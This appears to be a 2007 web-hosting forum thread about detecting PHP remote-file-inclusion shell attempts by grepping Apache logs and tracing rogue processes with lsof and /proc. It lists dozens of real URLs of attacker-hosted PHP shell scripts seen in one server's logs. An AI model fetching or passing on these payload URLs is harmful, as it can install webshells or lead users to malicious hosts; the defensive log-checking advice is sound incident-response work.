To check for possible hack/shell attempts

G

gerrybakker

Verified User
Joined
Apr 24, 2004
Messages
54
To check for possible hack/shell attempts - this search will identify the domains that had PHP injection used against them to try to run a script remotely - if it works then the hacker has a SHELL with root access even without the password - if not the site will simply ignore what happened.
If your script is hackable then update the script immediately to the latest version or find the patch that closes the whole.

I found live shells operating on some sites when I researched the results. First I run the remote URL all by itself which usually reveals the tool that was going to be injected. If I then concantenate the user site url and the remote string I get to see what they had accomplished. Sometimes the URL looks like an invalid gif or jpg - "view source" on that page and you'll see a nasty PHP script hidden in behind that innocent looking error screen.

cd /var/log/httpd/domains/
grep "path=" *.log

grep "path=" *.log | mail -s "possible hacks on my Server" [email protected]

It is using PHP injections scripts to load a SHELL onto the server through your site.

Here are the remote scripts that were run against my server in the last 24 hours. Some are nasty and some are useless but everyone of them is scary if you don’t have your PHP based sites properly patched against this exploit. A number of them are duplicates and were run hundreds of times against popular sites using Mambo, Joomla, Gallery, phpBB and others. This goes on every day. One of these was used against one vulnerable script by 100’s of simultaneous hackers from around the world using it to set up IRC bots and SPAM relays. Bottom line – check your servers’ LOGs as I did and you may find yourself a bit busy cleaning things up.

Warning:these are all php scripts so don't take a peek if you have php running on your desktop.

www.lasexta.net/templates/id.txt
indiablo.altervista.org/id.txt
www.tokyowww.com/alat/echo?
www.sunrunnerveterans.com/modules/Forums/phpmic.txt.txt
www.kolortavil.org/Connections/ok.txt
www.myviralspiral.com/forms/id.txt
destra.ca/s
projects.papanature.net/includes/cmd.txt
intranet.stantonmortgage.com/includes/pen.jpg
k-a.ru/ngl.gif
www.clan-ict.com/administrator/components/com_datsogallery/images/id.txt
rodda.ca/aan/info.txt? HTTP/1.0
www.servolinux.com.ar/mambo/images/zoom/pepe1/od2069.txt
www.lasexta.net/components/rm.txt
www.underground-revue.com/info.txt
www.zarha.org/pr.txt
82.177.24.73/~darek/safe.txt
englishforbusinessonline.com/tool20.dat
www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
www.osrm.ch/~ChHelbli/counterfolder/data/idmic2.txt
www.superlab.jazztel.es/safe.gif
www.modelismo.alternativo.nom.br//poll/polldata/readme.txt
claroline.lct-net.cl/id
www.myviralspiral.com/forms/id.txt
www.turboshells.us/spread.txt
www.lostwarriors.com//vwar/convert/main.txt
www.tegatani.org/images/ec.txt
img86.imageshack.us/img86/8232/idrc1.gif
cms.alm.cc/contenido/cronjobs/id.txt
speakerformula.com/speakerformula/cmd.txt
balcanhosting.com/id.txt
baguscrew.net/alat/cmd.txt
aspato-go.com/cartt/images/echo.txt
asaba.com/personals/pictures/temp
oz-star.com/remot.txt
www.pirateindustries.co.uk/smf/Themes/safe.txt
www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
projects.papanature.net/includes/cmd.txt
www.kolortavil.org/Connections/ok.txt
rampagingsoldiers.com/themes/Lexus-Blue/vuln.gif
www.mta.cl/galeria2/galery.txt
64.92.163.162/~myspaceg/images/help.txt
www.aeria.gr/gallery//photos/1/13419207/id.txt
www.avelectronics.ca/cal//ws/cmd.txt
www.zavod-avtosvet.ru//components/com_forum/cmd.txt
www.aeria.gr/gallery//photos/1/13419207/id.txt
www.feuerwehr-roedelmaier.de/dasepp_php_gb/id.txt
intranet.stantonmortgage.com/includes/pen.jpg
www.clan-ict.com/administrator/components/com_datsogallery/images/id.txt
estballet.ee/media/cmd.txt
www.modelismo.alternativo.nom.br//poll/polldata/readme.txt
indiablo.altervista.org/id.txt
askastro.com/bo.do
lamerinside.altervista.org/id.txt
www.apropertysolution.com/administrator/modules/bonek.txt
eventtoday.com/bbs/skin/gallery_thum/safe.txt

Remember that this is not a finite list - it is only a sampling of one server in one day but it should help bring the point of why every script on any site must be constantly updated.

FYI - we did have all the server hardening features in place and this type of thing still happened but thankfully the hackers couldn't really ruin the server as much as just load it down with their activities.
 
gerrybakker said:
cd /var/log/httpd/domains/
grep "path=" *.log
Click to expand...
I see how this works, but if I understand correctly all it does is indicate attempts.

When we see such attempts do we have to notify all these users that they need to make sure their sites are updated?

Can you give us insight as to what we have to look at on the site on our server to see if it's been hacked?

Do you think we should always run a local desktop (linux?) that doesn't have php installed on it, so we can look at these?
FYI - we did have all the server hardening features in place and this type of thing still happened but thankfully the hackers couldn't really ruin the server as much as just load it down with their activities.
Click to expand...
Can you give us an idea as to what you consider server hardening features?

Thanks.

Jeff
 
I'm interested too (surely not the only one besides Jeff), to hear more!
 
I ran in circles trying to find these potential hacks and after lots of googling came up with this series of steps to narrow down the possible intrusions. Notifying everyone on the server would have been a big job so here is how I narrowed it down to the one that actually got through.

If the server is running a rogue process - don't kill it yet.

If the attacker is not that smart or isn't hiding it, a simple command run against the suspect process ID (in this example 23977 is the process ID number)

Code: # lsof -p 23977

will show the location of the script used to start the process which will quickly show you which user and folder the hackable script is in as well as all of the commands run against this process. Amazing really.

lsof is a command meaning "list open files", which is used to report a list of all open files and the processes that opened them.

an alternative and simpler command is:
The /proc filesystem will tell you (among other things) where the executables are, by way of a symlink, which can be very handy. For example, running this command as root should tell you where the executable is located:

Code: # ls -l /proc/9713/exe

I like the first example better - more informative.

Once you have narrowed the suspect down to the appropriate folder - check the files that are in it to get acquainted with them for the next step.

Using
Code: # ps -aux
Check the exact date and time the script was started. Then go to the domain logs and run this command to look for all the log entries for that specific time and domain name.

cd /var/log/httpd/domains/
grep "03/Nov/2007:06:45:" suspectdomain.log

(you'll notice I didn't enter the seconds - only the minute I was looking for) Sure enough I got a log entry at that specific minute against a specific script in the suspect folder. Then by checking support forums for that script I found it was exploitable and applied the appropriate fix as suggested by that script community. The log entry also showed the remote script they were injecting into the php script. I checked out the remote script and could see what they were trying to do to my server and sure enough I could find the files they dropped where the script said they would be.

Once the rogue process has been identified and you've figured out which script is at fault KILL the rogue process and fix the faulty script problem.

You asked - which server hardening features? I applied most of the suggested techniques in
ELS - Easy Linux Security script
http://directadmin.com/forum/showthread.php?t=17070&highlight=els

I didn't feel comfortable running the automatic ELS script but I manually did most of it to my liking. It would be great if there was a DirectAdmin version of this script because the script was written for a cpanel install and there are enough differences to break a DirectAdmin install if blindly applied in automatic mode.
 
Last edited:
OK, GB. A little help for the little guy?

OK, gerry, not to sound like a neanderthalic nincompoop, but is there some way you could make that a little simpler for someone who might not be on the same plane of programmatics as you and Mr. Lasman there. I'm just barely getting up to speed on using the DirectAdmin system in regards to website construction/folder file placement/program functions. I just recently got hacked (and by the tenor of the thread conversation, rightly a timely subject), and I'm trying to find out EXACTLY how I can find out about this so I can stop it from happening down the road in the future. I'm REALLY tryin' to follow you, but it's all translating to Martian for all well as I know. Is there a more base understanding level that can be applied to the discussion? Or am I going to have to catch a headache in the future and really get to grips with the coding syntax. I don't have any problems with learning new things, but in all reality, gentleman, I have about 55 million things that have to be attended to all at the same time and I need to understand what the HELL is going on so I can fix my problem and get back to business (as I was so rudely interrupted by a defacement of a shark's snout as my welcome face to the digital world - thanks alot whoever you are YOU ASSFACED HACKER ****!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! And don't tell me crap about that you wouldn't even be mad if it happened to you, AND YOU DON"T EVEN GET TO SEE IT?!?!??!!? That's really chappin' my ass HARD, right now chief. I just registered my domain.........damn). So's anyway guys what can be done, here? I REALLY don't want to have to transfer to my sub-domain again (HIGHLY-RELIABLE, SUPER SPACE, SUPER
SAFE, but no sense of "my own address").
 
TKY_Publishing, you're probably not going to like my response.

I'm sorry if you don't understand the answers on the forums, but we're all volunteers here; you get what you get.

If you got hacked and you don't want your hacked server to be used for lots of bad things including criminal acts, you'd better stop doing those 55 million other things and start working on your server.

Or hire someone to do it for you.

Jeff
 
At this time ProFTPD offers no real-time options for protection due to the way their application is designed.

Upload Guardian still offers web based upload protection and the usualy cron and manual scan protection at your finger tips.
 
You must log in or register to reply here.
Back
Top